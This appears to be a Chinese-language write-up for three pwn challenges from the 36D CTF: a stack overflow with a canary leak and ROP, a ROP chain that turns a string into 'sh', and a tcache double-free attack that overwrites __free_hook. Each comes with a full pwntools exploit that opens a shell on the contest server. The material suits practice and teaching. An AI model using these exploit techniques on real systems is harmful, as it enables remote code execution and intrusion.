5月份36dctf

exec_comm.constprop+1162kaishell

PWN_MengxinStack

棧不會了orz
就是基本的棧溢出操控libc_start_main這個函數來控制程序流程需要將返回地址爆破到libc_start_main+176然後就是基本的ROP了
exp:

#!/usr/bin/python2
from pwn import *
p=0
def pwn(ip,port,debug):
	global p
	if debug==1:
		p=process('./mengxinpwn')
	#p=remote('124.156.121.112',28012)
		elf=ELF('./mengxinpwn')
		libc=elf.libc
	else:
		p=remote(ip,port)
		elf=ELF('./mengxinpwn')
		libc=elf.libc
	payload='a'*0x29
	p.sendafter('?',payload)
	p.recvuntil('a'*0x29)
	cannary=u64('\x00'+p.recv(7))
	stack_addr=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')- 304
	log.success('cannary: '+hex(cannary))
	log.success('stack: '+hex(stack_addr))
	p.send('a'*0x28+p64(cannary)+'a'*0x10+p64(stack_addr)+'\xf0\xd7')
	p.sendafter('?','a'*0x48)
	libcbase=u64(p.recvuntil('\x7f')[-6:]+'\x00\x00')-libc.sym['__libc_start_main']-240
	system=libcbase+libc.sym['system']
	bin_sh=libcbase+libc.search('/bin/sh').next()
	pop_rdi=libcbase+0x0000000000021102
	p.send('a'*0x28+p64(cannary)+'a'*0x18+p64(pop_rdi)+p64(bin_sh)+p64(system))
	p.interactive()
	return True
if __name__=="__main__":
	while 1:
		try:
			if pwn('124.156.121.112',28088,0)==True:
				break
		except Exception as e:
				p.close()
				continue

PWN_MagicString

這裏有個改變字符串的函數將ti編程sh即可
exp:

#!/usr/bin/python2
from pwn import *

def pwn():
	#p=process('./mackstring')
	p=remote('124.156.121.112',28012)
	elf=ELF('./mackstring')
	payload='a'*0x2a8+p64(0x400733)+p64(0x601048+5)+p64(0x40062D)
	payload+=p64(0x400732+1)+p64(0x601048)+p64(elf.plt['system'])
	p.sendlineafter('!',payload)
	p.interactive()

if __name__=="__main__":
	pwn()

PWN_babyheap

tcache的double free不難好像可以佈置好堆塊將tcache寫壞然後就行了

#!/usr/bin/python2
from pwn import *

def pwn():
	#p=process('./babyheap')
	p=remote('124.156.121.112',28025)
	elf=ELF('./babyheap')
	libc=elf.libc

	def add(data):
		p.sendlineafter('>>','1')
		p.sendlineafter(':',data)

	def delete(idx):
		p.sendlineafter('>>','2')
		p.sendlineafter(':',str(idx))

	def show(idx):
		p.sendlineafter('>>','3')
		p.sendlineafter(':',str(idx))

	add('\x01')
	add('\x02'*0x10)
	add('/bin/sh\x00')
	add('doudou3')
	add('doudou4')
	delete(0)
	delete(0)
	show(0)
	heap_base=u32(p.recv(4))-0x260
	log.success('heap_base: '+hex(heap_base))
	add(p64(heap_base+0x50))
	add(p64(heap_base+0x50))
	add(p64(0x30)+p64(0x00602060))
	add(p64(elf.got['free']))
	show(0)
	libcbase=u64(p.recvuntil('\x7f')[-6:].ljust(8,'\x00'))-libc.sym['free']
	system=libcbase+libc.sym['system']
	free_hook=libcbase+libc.sym['__free_hook']
	add(p64(free_hook))
	add(p64(0)+p64(free_hook))
	add(p64(system))
	delete(2)
	p.interactive()

if __name__=="__main__":
	pwn()